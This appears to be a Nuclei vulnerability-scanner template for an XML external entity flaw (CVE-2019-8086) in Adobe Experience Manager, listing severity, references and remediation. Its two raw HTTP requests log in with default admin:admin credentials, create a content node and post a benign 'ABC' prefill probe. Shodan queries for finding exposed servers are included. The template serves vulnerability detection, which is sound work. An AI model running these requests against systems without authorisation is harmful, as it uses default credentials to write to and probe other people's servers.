id: CVE-2019-8086

info:
  name: Adobe Experience Manager - XML External Entity Injection
  author: DhiyaneshDk
  severity: high
  description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution.
  remediation: |
    Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks.
  reference:
    - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13
    - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086
    - https://nvd.nist.gov/vuln/detail/CVE-2019-8086
    - https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-8086
    cwe-id: CWE-611
    epss-score: 0.09189
    epss-percentile: 0.94079
    cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: adobe
    product: experience_manager
    shodan-query:
      - http.title:"AEM Sign In"
      - http.component:"Adobe Experience Manager"
  tags: cve,cve2019,aem,adobe

http:
  - raw:
      - |
        POST /content/{{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Authorization: Basic YWRtaW46YWRtaW4=
        Referer: {{BaseURL}}

        sling:resourceType=fd/af/components/guideContainer

      - |
        POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Authorization: Basic YWRtaW46YWRtaW4=
        Referer: {{BaseURL}}

        guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"\u0041\u0042\u0043"}}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ABC'

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008368d1b81b50d3388ed41acdc91d4123c1608c248690ebf4ec827658549a54ce02207660bcd96e45fd2faa18f16d9bec21ac55a498b69fe26122eb359bb5e46d992e:922c64590222798bb761d5b6d8e72950